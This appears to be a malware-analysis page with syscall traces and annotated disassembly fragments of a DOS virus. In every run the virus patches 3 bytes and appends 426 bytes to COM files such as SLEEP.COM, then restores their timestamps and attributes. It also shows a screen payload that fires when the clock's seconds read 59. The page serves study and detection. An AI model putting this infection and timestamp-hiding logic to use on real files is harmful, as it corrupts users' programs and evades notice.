2018-12-25T12:40:45.298627486Z 66 PC: 12b37 | Move file pointer (See above)
; Excerpt 0x12ae9-0x12b24: 16-bit real-mode DOS code, the window the viewer shows around the logged PC.
; Visible here: after the per-file write, the file date/time and attributes are set from values held
; at bp+0x31a/0x31c/0x319, the handle is closed and the directory search continues.
; NOTE(review): 0x319/0x31a/0x31c are spaced like the attribute/time/date fields of a DOS find-first
; record, so these look like the values captured by the search - confirm against the full listing.
; Defender note: with timestamp and attributes put back, file size and content are the reliable change
; indicators; the trace logs a 3-byte and a 426-byte write to each opened file.
; Reading the trace: "Syscall Op" is AH in decimal (87 = 0x57) and PC is the address after the int.
2018-12-25T12:40:45.300262393Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0 ; DH = seconds returned by Get time (int 21h AH=2Ch)
0x12aec: je 0x12ae5 ; seconds == 0: back to 0x12ae5 (not shown; presumably re-issues Get time)
0x12aee: mov byte ptr cs:[bp + 0x292], dh ; store the non-zero seconds byte; its later use is outside this excerpt
0x12af3: call 0x12b6c ; routine not shown; the next logged call is the 426-byte write at PC 12c71
0x12af6: mov ax, 0x5701 ; int 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c] ; DX = date word to apply
0x12afe: mov cx, word ptr cs:[bp + 0x31a] ; CX = time word to apply
0x12b03: int 0x21 ; file handle is expected in BX, which is not loaded in this excerpt
0x12b05: mov ah, 0x3e ; int 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301 ; int 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd] ; DX -> file name string
0x12b10: xor ch, ch ; high byte of the attribute word cleared
0x12b12: mov cl, byte ptr cs:[bp + 0x319] ; CL = attribute byte to apply
0x12b17: int 0x21
0x12b19: mov ah, 0x4f ; int 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82 ; target not shown; the trace logs Find first/next at PC 12a84, i.e. an int at 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da] ; not reached by fall-through (jmp above); DX -> directory path string
0x12b22: mov ah, 0x3b ; int 21h AH=3Bh: change current directory
0x12b24: int 0x21 ; presumably returns to the directory read by the first logged call - confirm
2018-12-25T12:40:45.302514471Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.313038318Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.314780009Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.32253013Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.330851394Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.333275837Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.339866172Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.344946617Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.350408359Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.353058049Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.356621841Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.359322964Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.362459232Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.36604825Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.369159844Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.377620339Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.389141001Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.392228611Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.402035348Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.409518632Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.416508749Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.418020376Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.420147558Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.421970222Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.425501772Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.435333503Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.437494894Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.447232014Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.457975326Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.461252886Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.473482442Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.481010535Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.488722889Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.494379915Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.497364697Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.499089323Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.502351085Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.505572807Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.507127481Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.515980697Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.528003586Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.530993933Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.54222378Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.550109466Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.558736354Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.560621111Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.564199695Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.56577958Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.568493658Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.572143135Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.573888332Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.582526463Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.594255031Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.597213524Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.609020769Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.618665629Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.626109146Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.627840715Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.630571161Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.632078215Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.634864999Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.643071268Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.646342393Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.654825799Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.665610264Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.668862418Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.679544089Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.687607698Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.695031196Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.696400405Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.699002258Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.700862782Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.703343314Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.706341553Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.708417958Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.71641369Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.727051434Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.730628667Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.741834597Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.749998705Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.755672273Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.757226967Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.760264733Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.762907125Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.765990065Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.774150773Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.777140202Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.786079454Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.796179871Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.79869371Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.803289102Z 59 PC: 12b26 | Change current directory
; Excerpt 0x12b3c-0x12b62: screen output that runs only when the clock's seconds field is 59.
; Only a BIOS video call (int 10h) is visible in this window; the excerpt ends inside the display code.
; The page's run records carry "Second":0 or "Second":59; 59 is the value tested here.
2018-12-25T12:40:45.805357313Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b ; DH = seconds returned by Get time; compare with 59
0x12b3f: jne 0x12b6b ; any other second: skip to 0x12b6b (not shown)
0x12b41: mov bh, 0 ; int 10h AH=13h argument: video page 0
0x12b43: mov cx, 0xf00 ; pushed below and popped after the call; looks like an outer loop counter - loop end not shown
0x12b46: mov dh, 0xc ; row 12
0x12b48: mov dl, 5 ; column 5
0x12b4a: mov bl, 1 ; character attribute (colour) 1
0x12b4c: push cx ; keep CX while it is reused for the delay and the string length
0x12b4d: mov cx, 0x100 ; 256 iterations
0x12b50: push ax ; push/pop pair leaves AX unchanged: a short busy-wait
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp ; BP is restored after the call
0x12b55: add bp, 0x25f ; BP -> string 0x25f past the base held in BP (ES is not set in this excerpt)
0x12b59: mov cx, 0x2d ; string length = 45 characters
0x12b5c: mov ah, 0x13 ; int 10h AH=13h: write string; AL (write mode) is not set in this excerpt
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl ; next attribute value - presumably colour cycling on the following pass; excerpt ends here

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.362686818Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.36565813Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.367225028Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.37437621Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.389604265Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.400916249Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.409374211Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.411001894Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.415584976Z 66 PC: 12b37 | Move file pointer (See above)
; Excerpt 0x12ae9-0x12b24: 16-bit real-mode DOS code, the window the viewer shows around the logged PC.
; Visible here: after the per-file write, the file date/time and attributes are set from values held
; at bp+0x31a/0x31c/0x319, the handle is closed and the directory search continues.
; NOTE(review): 0x319/0x31a/0x31c are spaced like the attribute/time/date fields of a DOS find-first
; record, so these look like the values captured by the search - confirm against the full listing.
; Defender note: with timestamp and attributes put back, file size and content are the reliable change
; indicators; the trace logs a 3-byte and a 426-byte write to each opened file.
; Reading the trace: "Syscall Op" is AH in decimal (87 = 0x57) and PC is the address after the int.
2018-12-25T12:40:45.417383363Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0 ; DH = seconds returned by Get time (int 21h AH=2Ch)
0x12aec: je 0x12ae5 ; seconds == 0: back to 0x12ae5 (not shown; presumably re-issues Get time)
0x12aee: mov byte ptr cs:[bp + 0x292], dh ; store the non-zero seconds byte; its later use is outside this excerpt
0x12af3: call 0x12b6c ; routine not shown; the next logged call is the 426-byte write at PC 12c71
0x12af6: mov ax, 0x5701 ; int 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c] ; DX = date word to apply
0x12afe: mov cx, word ptr cs:[bp + 0x31a] ; CX = time word to apply
0x12b03: int 0x21 ; file handle is expected in BX, which is not loaded in this excerpt
0x12b05: mov ah, 0x3e ; int 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301 ; int 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd] ; DX -> file name string
0x12b10: xor ch, ch ; high byte of the attribute word cleared
0x12b12: mov cl, byte ptr cs:[bp + 0x319] ; CL = attribute byte to apply
0x12b17: int 0x21
0x12b19: mov ah, 0x4f ; int 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82 ; target not shown; the trace logs Find first/next at PC 12a84, i.e. an int at 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da] ; not reached by fall-through (jmp above); DX -> directory path string
0x12b22: mov ah, 0x3b ; int 21h AH=3Bh: change current directory
0x12b24: int 0x21 ; presumably returns to the directory read by the first logged call - confirm
2018-12-25T12:40:45.419879592Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.429046053Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.43086545Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.438394783Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.44898659Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.451727608Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.461272698Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.47240569Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.479358755Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.480973153Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.484120825Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.488089536Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.495080758Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.50035804Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.503510451Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.511768133Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.521792239Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.525961469Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.535877543Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.542644293Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.550973945Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.552839007Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.555783119Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.558350815Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.561344686Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.569692221Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.572806985Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.580837826Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.613077921Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.615673921Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.627354644Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.633773773Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.641521958Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.643463768Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.64612022Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.647899098Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.650940905Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.65394598Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.655816277Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.663800775Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.673559039Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.677331927Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.687330816Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.694015063Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.700652723Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.703201186Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.706007996Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.707626525Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.711221774Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.714290558Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.71603173Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.724212007Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.734012118Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.736864139Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.747689483Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.754897378Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.76139709Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.763421991Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.766500829Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.768173894Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.771007977Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.779202291Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.780920294Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.789287689Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.799014171Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.801880367Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.812790742Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.819651163Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.826557521Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.828868173Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.832039226Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.833649177Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.83642226Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.840259015Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.841938423Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.849310005Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.859988285Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.86277722Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.872554156Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.880336288Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.883047832Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.884358714Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.887856218Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.889229654Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.891618246Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.895678135Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.897464397Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.905318539Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.916132209Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.919197661Z 59 PC: 12a75 | Change current directory
2018-12-25T12:40:45.923448998Z 59 PC: 12b26 | Change current directory
; Excerpt 0x12b3c-0x12b62: screen output that runs only when the clock's seconds field is 59.
; Only a BIOS video call (int 10h) is visible in this window; the excerpt ends inside the display code.
; The page's run records carry "Second":0 or "Second":59; 59 is the value tested here.
2018-12-25T12:40:45.925829079Z 44 PC: 12b3c | Get time 0x12b3c: cmp dh, 0x3b ; DH = seconds returned by Get time; compare with 59
0x12b3f: jne 0x12b6b ; any other second: skip to 0x12b6b (not shown)
0x12b41: mov bh, 0 ; int 10h AH=13h argument: video page 0
0x12b43: mov cx, 0xf00 ; pushed below and popped after the call; looks like an outer loop counter - loop end not shown
0x12b46: mov dh, 0xc ; row 12
0x12b48: mov dl, 5 ; column 5
0x12b4a: mov bl, 1 ; character attribute (colour) 1
0x12b4c: push cx ; keep CX while it is reused for the delay and the string length
0x12b4d: mov cx, 0x100 ; 256 iterations
0x12b50: push ax ; push/pop pair leaves AX unchanged: a short busy-wait
0x12b51: pop ax
0x12b52: loop 0x12b50
0x12b54: push bp ; BP is restored after the call
0x12b55: add bp, 0x25f ; BP -> string 0x25f past the base held in BP (ES is not set in this excerpt)
0x12b59: mov cx, 0x2d ; string length = 45 characters
0x12b5c: mov ah, 0x13 ; int 10h AH=13h: write string; AL (write mode) is not set in this excerpt
0x12b5e: int 0x10
0x12b60: pop bp
0x12b61: pop cx
0x12b62: inc bl ; next attribute value - presumably colour cycling on the following pass; excerpt ends here

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":59,"TimeBased":true,"OriginalID":14467,"SideJobID":0}


Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:40:45.375699011Z 71 PC: 12a63 | Get current directory
2018-12-25T12:40:45.379002813Z 26 PC: 12b2f | Set disk transfer address
2018-12-25T12:40:45.38018186Z 78 PC: 12a84 | Find first file
2018-12-25T12:40:45.38677969Z 67 PC: 12aa1 | Get or set file attributes
2018-12-25T12:40:45.402857089Z 61 PC: 12aaa | Open file (Filename = 'SLEEP.COM')
2018-12-25T12:40:45.40758113Z 63 PC: 12ab6 | Read file or device (Read 3 bytes on handle 5)
2018-12-25T12:40:45.413732109Z 66 PC: 12b37 | Move file pointer
2018-12-25T12:40:45.415350857Z 64 PC: 12ae0 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T12:40:45.418772981Z 66 PC: 12b37 | Move file pointer (See above)
; Excerpt 0x12ae9-0x12b24: 16-bit real-mode DOS code, the window the viewer shows around the logged PC.
; Visible here: after the per-file write, the file date/time and attributes are set from values held
; at bp+0x31a/0x31c/0x319, the handle is closed and the directory search continues.
; NOTE(review): 0x319/0x31a/0x31c are spaced like the attribute/time/date fields of a DOS find-first
; record, so these look like the values captured by the search - confirm against the full listing.
; Defender note: with timestamp and attributes put back, file size and content are the reliable change
; indicators; the trace logs a 3-byte and a 426-byte write to each opened file.
; Reading the trace: "Syscall Op" is AH in decimal (87 = 0x57) and PC is the address after the int.
2018-12-25T12:40:45.420363188Z 44 PC: 12ae9 | Get time 0x12ae9: cmp dh, 0 ; DH = seconds returned by Get time (int 21h AH=2Ch)
0x12aec: je 0x12ae5 ; seconds == 0: back to 0x12ae5 (not shown; presumably re-issues Get time)
0x12aee: mov byte ptr cs:[bp + 0x292], dh ; store the non-zero seconds byte; its later use is outside this excerpt
0x12af3: call 0x12b6c ; routine not shown; the next logged call is the 426-byte write at PC 12c71
0x12af6: mov ax, 0x5701 ; int 21h AX=5701h: set file date and time
0x12af9: mov dx, word ptr cs:[bp + 0x31c] ; DX = date word to apply
0x12afe: mov cx, word ptr cs:[bp + 0x31a] ; CX = time word to apply
0x12b03: int 0x21 ; file handle is expected in BX, which is not loaded in this excerpt
0x12b05: mov ah, 0x3e ; int 21h AH=3Eh: close file
0x12b07: int 0x21
0x12b09: mov ax, 0x4301 ; int 21h AX=4301h: set file attributes
0x12b0c: lea dx, word ptr [bp + 0x2cd] ; DX -> file name string
0x12b10: xor ch, ch ; high byte of the attribute word cleared
0x12b12: mov cl, byte ptr cs:[bp + 0x319] ; CL = attribute byte to apply
0x12b17: int 0x21
0x12b19: mov ah, 0x4f ; int 21h AH=4Fh: find next file
0x12b1b: jmp 0x12a82 ; target not shown; the trace logs Find first/next at PC 12a84, i.e. an int at 0x12a82
0x12b1e: lea dx, word ptr [bp + 0x2da] ; not reached by fall-through (jmp above); DX -> directory path string
0x12b22: mov ah, 0x3b ; int 21h AH=3Bh: change current directory
0x12b24: int 0x21 ; presumably returns to the directory read by the first logged call - confirm
2018-12-25T12:40:45.426109117Z 64 PC: 12c71 | Write file or device (Write 426 bytes on handle 5)
2018-12-25T12:40:45.435876178Z 87 PC: 12b05 | Get or set file date and time
2018-12-25T12:40:45.437617068Z 62 PC: 12b09 | Close file
2018-12-25T12:40:45.4460396Z 67 PC: 12b19 | Get or set file attributes
2018-12-25T12:40:45.457511036Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.460616374Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.471532607Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.47997162Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.4873751Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.488953075Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.492250797Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.494677891Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.498123733Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.501392061Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.504303935Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.512627086Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.523500768Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.5274261Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.538374056Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.546586717Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.558643521Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.560367528Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.563283748Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.566617242Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.569521446Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.579108473Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.58182491Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.590383333Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.601153973Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.60300962Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.609453374Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.613683606Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.617983097Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.619781632Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.621880974Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.623099146Z 44 PC: 12ae9 | Get time (See above)
2018-12-25T12:40:45.625413334Z 64 PC: 12c71 | Write file or device (See above)
2018-12-25T12:40:45.628255491Z 87 PC: 12b05 | Get or set file date and time (See above)
2018-12-25T12:40:45.629812519Z 62 PC: 12b09 | Close file (See above)
2018-12-25T12:40:45.638969804Z 67 PC: 12b19 | Get or set file attributes (See above)
2018-12-25T12:40:45.647206186Z 79 PC: 12a84 | Find next file (See above)
2018-12-25T12:40:45.649117678Z 67 PC: 12aa1 | Get or set file attributes (See above)
2018-12-25T12:40:45.656328391Z 61 PC: 12aaa | Open file (See above)
2018-12-25T12:40:45.660731075Z 63 PC: 12ab6 | Read file or device (See above)
2018-12-25T12:40:45.664919366Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.666681015Z 64 PC: 12ae0 | Write file or device (See above)
2018-12-25T12:40:45.670097918Z 66 PC: 12b37 | Move file pointer (See above)
2018-12-25T12:40:45.672021693Z 44 PC: 12ae9 | Get time (See above)
